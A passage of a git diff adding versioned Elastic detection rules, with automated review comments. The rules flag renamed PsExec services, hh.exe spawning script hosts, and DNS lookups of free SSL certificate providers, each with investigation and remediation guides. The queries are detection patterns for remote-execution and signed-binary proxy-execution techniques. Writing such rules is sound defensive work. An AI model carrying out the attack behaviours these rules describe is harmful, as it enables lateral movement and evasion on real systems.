antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"psexesvc.exe\" and not process.name : \"PSEXESVC.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + 
], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111.json new file mode 100644 index 00000000000..b42b8083ebd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Execution via Renamed PsExec Executable", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Execution via Renamed PsExec Executable\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. It operates by executing a service component `Psexecsvc` on a remote system, which then runs a specified process and returns the results to the local system. Microsoft develops PsExec as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections.\n\nThis rule identifies instances where the PsExec service component is executed using a custom name. 
This behavior can indicate an attempt to bypass security controls or detections that look for the default PsExec service component name.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"psexesvc.exe\" and not process.name : \"PSEXESVC.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + 
], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_109.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_109.json new file mode 100644 index 00000000000..2df3059654f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_109.json 
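Review bot: The false-positive guidance for this rule lives only inside the `note` Markdown ("### False positive analysis"), whereas the sibling rule e3343ab9 added in this same commit also carries a top-level `false_positives` array that Kibana surfaces on the rule details page; consider adding `"false_positives": ["PsExec is commonly used by administrators; confirm the tool is allowed by the organization's administration policy before dismissing."]` here so the two rules are consistent. The query keys on `process.pe.original_file_name`, a field that, as far as I know, only PE-metadata-aware sources such as Elastic Defend and Sysmon populate, which is consistent with `logs-system.security*` being absent from `index`; a one-line remark in `setup` stating that the rule has no coverage from Windows Security audit process-creation events would save operators from enabling it on the wrong data. If the `index` narrowing to `logs-endpoint.events.process-*` is the only delta from the version 110 file, stating that in the PR description would make the versioned snapshots easier to review.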
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. Adversaries may conceal malicious code in a CHM file and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe).", + "false_positives": [ + "The HTML Help executable program (hh.exe) runs whenever a user clicks a compiled help (.chm) file or menu item that opens the help file inside the Help Viewer. This is not always malicious, but adversaries may abuse this technology to conceal malicious code." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Activity via Compiled HTML File", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, 
path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + 
"name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.001", + "name": "Compiled HTML File", + "reference": "https://attack.mitre.org/techniques/T1218/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "e3343ab9-4245-4715-b344-e11c56b0a47f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_110.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_110.json new file mode 100644 index 00000000000..89615093ff8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_110.json 
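Review bot: The investigation guide in `note` ends its "Possible investigation steps" with "searching for login events (for example, 4624) to the target host after the registry modification", but this rule detects a process spawned by `hh.exe`, not a registry change, so the sentence reads as a copy-paste artifact from another guide; change it to `... to the target host around the time of the alert.` The same section also says "Retrieve `.chm`, `.ps1`, and other files that were involved to further examination", which should read `for further examination`. Both defects are repeated verbatim in the version 110 file added by the next hunk, so fixing them there would avoid shipping a new version with a known wrong guide.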
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. Adversaries may conceal malicious code in a CHM file and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe).", + "false_positives": [ + "The HTML Help executable program (hh.exe) runs whenever a user clicks a compiled help (.chm) file or menu item that opens the help file inside the Help Viewer. This is not always malicious, but adversaries may abuse this technology to conceal malicious code." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Activity via Compiled HTML File", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, 
path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + 
"name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.001", + "name": "Compiled HTML File", + "reference": "https://attack.mitre.org/techniques/T1218/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e3343ab9-4245-4715-b344-e11c56b0a47f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106.json new file mode 100644 index 00000000000..574109d3bc4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106.json 
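Review bot: The `index` list in this version narrows the Elastic Defend pattern to `logs-endpoint.events.process-*`, which matches the `process where` query, but it still leaves the Windows integration pattern as the wildcard `logs-windows.*`, so every data stream of that integration is scanned for an event that only the process-creation streams can carry. If the intent is Sysmon plus forwarded Security events, `"logs-windows.sysmon_operational-*", "logs-windows.forwarded*"` would be the narrower equivalent; I am inferring the intent from the `logs-system.security*` entry and the `Data Source` tags, so please confirm against the source rule in detection-rules before changing it.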
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Free SSL Certificate Providers", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n\n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n\n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1573", + "name": "Encrypted Channel", + "reference": "https://attack.mitre.org/techniques/T1573/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107.json new file mode 100644 index 00000000000..22028f5f21e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107.json 
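Review bot: The `dns.question.name` patterns in `query` are inconsistent about apex domains: `*letsencrypt.org` matches the apex and any subdomain (and also any unrelated name merely ending in `letsencrypt.org`), while `*.sslforfree.com`, `*.zerossl.com` and `*.freessl.org` require a leading label and therefore miss a lookup of the bare apex. Listing each provider as apex plus wildcard subdomain, e.g. `dns.question.name : ("letsencrypt.org", "*.letsencrypt.org", "sslforfree.com", "*.sslforfree.com", "zerossl.com", "*.zerossl.com", "freessl.org", "*.freessl.org")`, makes the intent explicit and removes the over-broad suffix match. The same query string also carries literal tab characters in its indentation (`\n\t`), which is harmless to EQL but worth normalizing to spaces for readability. Both points apply unchanged to the version 107 file in the next hunk.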
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.network-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Free SSL Certificate Providers", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n\n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n\n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 